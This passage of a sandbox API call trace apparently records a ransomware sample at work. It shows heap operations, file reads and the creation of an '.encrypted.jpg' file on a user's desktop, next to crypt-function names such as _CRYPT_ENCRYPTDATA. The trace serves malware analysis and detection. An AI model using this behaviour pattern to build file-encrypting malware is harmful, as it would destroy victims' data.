liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0031.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.199] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.199] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.199] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0031.201] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni")) returned 0x10 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0031.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.encrypted.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\jjp_bfl.encrypted.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0031.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.202] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0031.202] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.202] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0031.202] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.203] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.203] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0031.205] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x710f, lpOverlapped=0x0) returned 1 [0031.206] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1710f) returned 0x935008 [0031.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0031.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1710f) returned 0x94c120 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.225] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1710f) returned 0x935008 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.225] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.225] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.225] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1710f) returned 0x935008 [0031.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0031.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0031.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1710f) returned 0x8affc0 [0031.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.228] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.228] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0031.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.228] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da328 [0031.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c778 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.229] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.229] 